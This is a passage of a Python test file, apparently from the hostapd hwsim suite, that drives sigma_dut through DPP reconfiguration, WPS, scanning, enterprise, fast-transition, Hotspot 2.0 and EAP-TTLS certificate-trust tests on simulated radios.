res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,DPPReconfigure,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "status,COMPLETE,ReconfigAuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected reconfiguration result: " + res)
ev = dev[1].wait_event(["DPP-CONF-SENT"], timeout=15)
if ev is None:
raise Exception("DPP Config Response (reconfig) not transmitted")
dev[0].wait_connected(timeout=20)
ev = dev[1].wait_event(["DPP-CONN-STATUS-RESULT"], timeout=20)
if ev is None:
raise Exception("No connection status reported")
if "result=0" not in ev:
raise Exception("Connection status did not report success: " + ev)
time.sleep(1)
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
dev[0].dump_monitor()
dev[1].dump_monitor()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,DPPReconfigure,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=30)
if "status,COMPLETE,ReconfigAuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected reconfiguration [2] result: " + res)
ev = dev[1].wait_event(["DPP-CONF-SENT"], timeout=5)
if ev is None:
raise Exception("DPP Config Response (reconfig) not transmitted [2]")
dev[0].wait_connected(timeout=20)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_reconfig_configurator(dev, apdev):
"""sigma_dut DPP reconfiguration (Configurator)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[1].set("dpp_config_processing", "1")
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
ifname = dev[0].ifname
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPConfIndex,1,DPPBS,QR,DPPTimeout,6", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[0].dump_monitor()
ev = dev[1].wait_event(["DPP-NETWORK-ID"], timeout=1)
if ev is None:
raise Exception("No network profile created")
id = int(ev.split(' ')[1])
ev = dev[1].wait_event(["DPP-TX-STATUS"], timeout=5)
if ev is None:
raise Exception("Configuration Result not sent")
dev[1].dump_monitor()
cmd = "DPP_RECONFIG %d" % id
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start reconfiguration")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,DPPReconfigure,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPConfIndex,2,DPPListenChannel,6,DPPTimeout,6", timeout=10)
if "status,COMPLETE,ReconfigAuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected reconfiguration result: " + res)
ev = dev[1].wait_event(["DPP-CONF-RECEIVED"], timeout=15)
if ev is None:
raise Exception("DPP Config Response (reconfig) not received")
finally:
dev[0].set("dpp_config_processing", "0")
dev[1].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_reconfig_no_proto_ver(dev, apdev):
"""sigma_dut DPP reconfiguration (Configurator) - missing Protocol Version"""
run_sigma_dut_dpp_reconfig_proto(dev, apdev, "MissingAttribute")
def test_sigma_dut_dpp_reconfig_invalid_proto_ver(dev, apdev):
"""sigma_dut DPP reconfiguration (Configurator) - invalid Protocol Version"""
run_sigma_dut_dpp_reconfig_proto(dev, apdev, "InvalidValue")
def run_sigma_dut_dpp_reconfig_proto(dev, apdev, dpp_step):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[1].set("dpp_config_processing", "1")
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
ifname = dev[0].ifname
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPConfIndex,1,DPPBS,QR,DPPTimeout,6", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[0].dump_monitor()
ev = dev[1].wait_event(["DPP-NETWORK-ID"], timeout=1)
if ev is None:
raise Exception("No network profile created")
id = int(ev.split(' ')[1])
ev = dev[1].wait_event(["DPP-TX-STATUS"], timeout=5)
if ev is None:
raise Exception("Configuration Result not sent")
dev[1].dump_monitor()
cmd = "DPP_RECONFIG %d" % id
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start reconfiguration")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,DPPReconfigure,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPConfIndex,2,DPPStep,%s,DPPFrameType,ReconfigAuthRequest,DPPIEAttribute,ProtocolVersion,DPPListenChannel,6,DPPTimeout,6" % dpp_step, timeout=10)
if "status,COMPLETE,ReconfigAuthResult,Errorsent" not in res:
raise Exception("Unexpected reconfiguration result: " + res)
ev = dev[1].wait_event(["DPP-CONF-RECEIVED"], timeout=5)
if ev is not None:
raise Exception("DPP Config Response (reconfig) received unexpectedly")
finally:
dev[0].set("dpp_config_processing", "0")
dev[1].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_preconfigured_profile(dev, apdev):
"""sigma_dut controlled connection using preconfigured profile"""
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
params = hostapd.wpa2_params(ssid="test-psk", passphrase="12345678")
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-psk", psk="12345678", scan_freq="2412",
only_add_network=True)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s" % (ifname, "test-psk"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_wps_pbc(dev, apdev):
"""sigma_dut and WPS PBC Enrollee"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{"ssid": "wps", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
hapd.request("WPS_PBC")
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
cmd = "start_wps_registration,interface,%s" % ifname
cmd += ",WpsRole,Enrollee"
cmd += ",WpsConfigMethod,PBC"
sigma_dut_cmd_check(cmd, timeout=15)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
hapd.disable()
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
dev[0].flush_scan_cache()
def test_sigma_dut_sta_scan_bss(dev, apdev):
"""sigma_dut sta_scan_bss"""
hapd = hostapd.add_ap(apdev[0], {"ssid": "test"})
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "sta_scan_bss,Interface,%s,BSSID,%s" % (dev[0].ifname, \
hapd.own_addr())
res = sigma_dut_cmd(cmd, timeout=10)
if "ssid,test,bsschannel,1" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sta_scan_ssid_bssid(dev, apdev):
"""sigma_dut sta_scan GetParameter,SSID_BSSID"""
hostapd.add_ap(apdev[0], {"ssid": "abcdef"})
hostapd.add_ap(apdev[1], {"ssid": "qwerty"})
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "sta_scan,Interface,%s,GetParameter,SSID_BSSID" % dev[0].ifname
res = sigma_dut_cmd(cmd, timeout=10)
if "abcdef" not in res or "qwerty" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sta_scan_short_ssid(dev, apdev):
"""sigma_dut sta_scan ShortSSID"""
dev[0].flush_scan_cache()
ssid = "test-short-ssid-list"
hapd = hostapd.add_ap(apdev[0], {"ssid": ssid,
"ignore_broadcast_ssid": "1"})
bssid = apdev[0]['bssid']
payload = struct.pack('>L', binascii.crc32(ssid.encode()))
val = binascii.hexlify(payload).decode()
sigma = start_sigma_dut(dev[0].ifname)
found = False
try:
cmd = "sta_scan,Interface,%s,ChnlFreq,2412,ShortSSID,%s" % (dev[0].ifname, val)
for i in range(10):
sigma_dut_cmd_check(cmd, timeout=5)
ev = dev[0].wait_event(["CTRL-EVENT-SCAN-RESULTS"])
if ev is None:
raise Exception("Scan did not complete")
if bssid in dev[0].request("SCAN_RESULTS"):
found = True
break
finally:
stop_sigma_dut(sigma)
dev[0].request("VENDOR_ELEM_REMOVE 14 *")
if not found:
raise Exception("AP not found in scan results")
def test_sigma_dut_sta_scan_wait_completion(dev, apdev):
"""sigma_dut sta_scan WaitCompletion,1"""
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "sta_scan,Interface,%s,ChnlFreq,2412,WaitCompletion,1" % dev[0].ifname
res = sigma_dut_cmd(cmd, timeout=10)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_osen(dev, apdev, params):
"""sigma_dut controlled AP with OSEN"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_osen.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-hs20,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OSEN,PMF,Optional")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
# RSN-OSEN (for OSU)
dev[0].connect("test-hs20", proto="OSEN", key_mgmt="OSEN",
pairwise="CCMP", group="GTK_NOT_USED",
eap="WFA-UNAUTH-TLS", identity="[email protected]",
ca_cert="auth_serv/ca.pem", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_eap_osen(dev, apdev, params):
"""sigma_dut controlled AP with EAP+OSEN"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_eap_osen.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, bridge="ap-br0", hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-hs20,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-OSEN,PMF,Optional")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
subprocess.call(['brctl', 'setfd', 'ap-br0', '0'])
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
# RSN-OSEN (for OSU)
dev[0].connect("test-hs20", proto="OSEN", key_mgmt="OSEN",
pairwise="CCMP",
eap="WFA-UNAUTH-TLS", identity="[email protected]",
ca_cert="auth_serv/ca.pem", ieee80211w='2',
scan_freq="2412")
# RSN-EAP (for data connection)
dev[1].connect("test-hs20", key_mgmt="WPA-EAP", eap="TTLS",
identity="hs20-test", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
ieee80211w='2', scan_freq="2412")
hwsim_utils.test_connectivity(dev[0], dev[1], broadcast=False,
success_expected=False, timeout=1)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'],
stderr=open('/dev/null', 'w'))
subprocess.call(['brctl', 'delbr', 'ap-br0'],
stderr=open('/dev/null', 'w'))
def test_sigma_dut_ap_eap(dev, apdev, params):
"""sigma_dut controlled AP WPA2-Enterprise"""
logdir = os.path.join(params['logdir'], "sigma_dut_ap_eap.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-eap,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-eap", key_mgmt="WPA-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_eap_sha256(dev, apdev, params):
"""sigma_dut controlled AP WPA2-Enterprise SHA256"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_eap_sha256.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-eap,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-256")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-eap", key_mgmt="WPA-EAP-SHA256", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ft_eap(dev, apdev, params):
"""sigma_dut controlled AP FT-EAP"""
logdir = os.path.join(params['logdir'], "sigma_dut_ap_ft_eap.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-eap,MODE,11ng,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-EAP")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-ft-eap", key_mgmt="FT-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ft_psk(dev, apdev, params):
"""sigma_dut controlled AP FT-PSK"""
logdir = os.path.join(params['logdir'], "sigma_dut_ap_ft_psk.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-psk,MODE,11ng,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-PSK,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-ft-psk", key_mgmt="FT-PSK", psk="12345678",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ft_over_ds_psk(dev, apdev, params):
"""sigma_dut controlled AP FT-PSK (over-DS)"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_ft_over_ds_psk.sigma-hostapd")
conffile = os.path.join(params['logdir'],
"sigma_dut_ap_ft_over_ds_psk.sigma-conf")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-psk,MODE,11ng,DOMAIN,0101,FT_DS,Enable")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-PSK,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].connect("test-ft-psk", key_mgmt="FT-PSK", psk="12345678",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
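# The two nested open() calls above copy the hostapd configuration written by
# sigma_dut to /tmp/sigma_dut-ap.conf into the log directory; the same pattern
# appears in several AP tests in this file. A hedged sketch of a shared helper
# (the function name is illustrative, not part of the original tests):
def save_sigma_dut_ap_conf(dst):
    with open("/tmp/sigma_dut-ap.conf", "rb") as src:
        with open(dst, "wb") as out:
            out.write(src.read())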
def test_sigma_dut_ap_ent_ft_eap(dev, apdev, params):
"""sigma_dut controlled AP WPA-EAP and FT-EAP"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_ent_ft_eap.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ent-ft-eap,MODE,11ng,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-FT-EAP")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-ent-ft-eap", key_mgmt="FT-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
dev[1].connect("test-ent-ft-eap", key_mgmt="WPA-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_venue_url(dev, apdev):
"""sigma_dut controlled Venue URL fetch"""
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "venue"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
venue_group = 1
venue_type = 13
venue_info = struct.pack('BB', venue_group, venue_type)
lang1 = "eng"
name1 = "Example venue"
lang2 = "fin"
name2 = "Esimerkkipaikka"
venue1 = struct.pack('B', len(lang1 + name1)) + lang1.encode() + name1.encode()
venue2 = struct.pack('B', len(lang2 + name2)) + lang2.encode() + name2.encode()
venue_name = binascii.hexlify(venue_info + venue1 + venue2)
url1 = "http://example.com/venue"
url2 = "https://example.org/venue-info/"
params["venue_group"] = str(venue_group)
params["venue_type"] = str(venue_type)
params["venue_name"] = [lang1 + ":" + name1, lang2 + ":" + name2]
params["venue_url"] = ["1:" + url1, "2:" + url2]
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required" % (ifname, "venue", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "venue"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_hs2_venue_info,interface," + ifname + ",Display,Yes")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
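# The venue_info/venue1/venue2 byte strings built above follow the Venue Name
# duple layout: a one-octet length covering the three-octet language code plus
# the UTF-8 name, followed by those bytes. The hex-encoded venue_name mirrors
# the raw ANQP payload, while the hostapd parameters use the "lang:name" form.
# A hedged sketch of the duple encoding as a helper (illustrative name only):
def encode_venue_name_duple(lang, name):
    data = lang.encode() + name.encode()
    return struct.pack('B', len(data)) + data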
def test_sigma_dut_hs20_assoc_24(dev, apdev):
"""sigma_dut controlled Hotspot 2.0 connection (2.4 GHz)"""
run_sigma_dut_hs20_assoc(dev, apdev, True)
def test_sigma_dut_hs20_assoc_5(dev, apdev):
"""sigma_dut controlled Hotspot 2.0 connection (5 GHz)"""
run_sigma_dut_hs20_assoc(dev, apdev, False)
def run_sigma_dut_hs20_assoc(dev, apdev, band24):
hapd0 = None
hapd1 = None
try:
bssid0 = apdev[0]['bssid']
params = hs20_ap_params()
params['hessid'] = bssid0
hapd0 = hostapd.add_ap(apdev[0], params)
bssid1 = apdev[1]['bssid']
params = hs20_ap_params()
params['hessid'] = bssid0
params["hw_mode"] = "a"
params["channel"] = "36"
params["country_code"] = "US"
hapd1 = hostapd.add_ap(apdev[1], params)
band = "2.4" if band24 else "5"
exp_bssid = bssid0 if band24 else bssid1
run_sigma_dut_hs20_assoc_2(dev, apdev, band, exp_bssid)
finally:
dev[0].request("DISCONNECT")
if hapd0:
hapd0.request("DISABLE")
if hapd1:
hapd1.request("DISABLE")
subprocess.call(['iw', 'reg', 'set', '00'])
dev[0].flush_scan_cache()
def run_sigma_dut_hs20_assoc_2(dev, apdev, band, expect_bssid):
check_eap_capa(dev[0], "MSCHAPV2")
dev[0].flush_scan_cache()
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,HS2-R3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_add_credential,interface,%s,type,uname_pwd,realm,example.com,username,hs20-test,password,password" % ifname)
res = sigma_dut_cmd_check("sta_hs2_associate,interface,%s,band,%s" % (ifname, band),
timeout=15)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
if "BSSID," + expect_bssid not in res:
raise Exception("Unexpected BSSID: " + res)
def test_sigma_dut_ap_hs20(dev, apdev, params):
"""sigma_dut controlled AP with Hotspot 2.0 parameters"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_hs20.sigma-hostapd")
conffile = os.path.join(params['logdir'],
"sigma_dut_ap_hs20.sigma-conf")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,program,HS2-R3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,test-hs20,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,WLAN_TAG,1,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,WPA2-ENT")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,HESSID,02:12:34:56:78:9a,NAI_REALM_LIST,1,OPER_NAME,1")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,OSU_SERVER_URI,https://example.com/ https://example.org/,OSU_SSID,test-osu,OSU_METHOD,SOAP SOAP,OSU_PROVIDER_LIST,10,OSU_PROVIDER_NAI_LIST,4")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,NET_AUTH_TYPE,2")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,VENUE_NAME,1")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,DOMAIN_LIST,example.com")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,OPERATOR_ICON_METADATA,1")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,SSID,test-osu,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,NONE")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,2,OSU,1")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_eap_ttls_uosc(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS with UOSC"""
logdir = params['logdir']
with open("auth_serv/ca.pem", "r") as f:
with open(os.path.join(logdir, "sigma_dut_eap_ttls_uosc.ca.pem"),
"w") as f2:
f2.write(f.read())
src = "auth_serv/server.pem"
dst = os.path.join(logdir, "sigma_dut_eap_ttls_uosc.server.der")
hashdst = os.path.join(logdir, "sigma_dut_eap_ttls_uosc.server.pem.sha256")
subprocess.check_call(["openssl", "x509", "-in", src, "-out", dst,
"-outform", "DER"],
stderr=open('/dev/null', 'w'))
with open(dst, "rb") as f:
der = f.read()
hash = hashlib.sha256(der).digest()
with open(hashdst, "w") as f:
f.write(binascii.hexlify(hash).decode())
dst = os.path.join(logdir, "sigma_dut_eap_ttls_uosc.incorrect.pem.sha256")
with open(dst, "w") as f:
f.write(32*"00")
ssid = "test-wpa2-eap"
params = hostapd.wpa2_eap_params(ssid=ssid)
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
try:
cmd = "sta_set_security,type,eapttls,interface,%s,ssid,%s,keymgmttype,wpa2,encType,AES-CCMP,PairwiseCipher,AES-CCMP-128,username,DOMAIN\mschapv2 user,password,password,ServerCert,sigma_dut_eap_ttls_uosc.incorrect.pem" % (ifname, ssid)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-TLS-CERT-ERROR"], timeout=10)
if ev is None:
raise Exception("Server certificate error not reported")
res = sigma_dut_cmd_check("dev_exec_action,program,WPA3,interface,%s,ServerCertTrust,Accept" % ifname)
if "ServerCertTrustResult,Accepted" not in res:
raise Exception("Server certificate trust was not accepted")
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev[0].dump_monitor()
finally:
stop_sigma_dut(sigma)
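# The UOSC tests prepare certificate material for sigma_dut by converting the
# server certificate to DER and storing its SHA-256 fingerprint as a hex
# string in a .sha256 file in the certificate directory. A hedged sketch of
# that preparation as one helper (illustrative name; assumes openssl in PATH):
def write_server_cert_hash(pem_src, der_dst, hash_dst):
    subprocess.check_call(["openssl", "x509", "-in", pem_src, "-out", der_dst,
                           "-outform", "DER"],
                          stderr=open('/dev/null', 'w'))
    with open(der_dst, "rb") as f:
        der = f.read()
    with open(hash_dst, "w") as f:
        f.write(binascii.hexlify(hashlib.sha256(der).digest()).decode())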
def test_sigma_dut_eap_ttls_uosc_tod(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS with UOSC/TOD-STRICT"""
run_sigma_dut_eap_ttls_uosc_tod(dev, apdev, params, False)
def test_sigma_dut_eap_ttls_uosc_tod_tofu(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS with UOSC/TOD-TOFU"""
run_sigma_dut_eap_ttls_uosc_tod(dev, apdev, params, True)
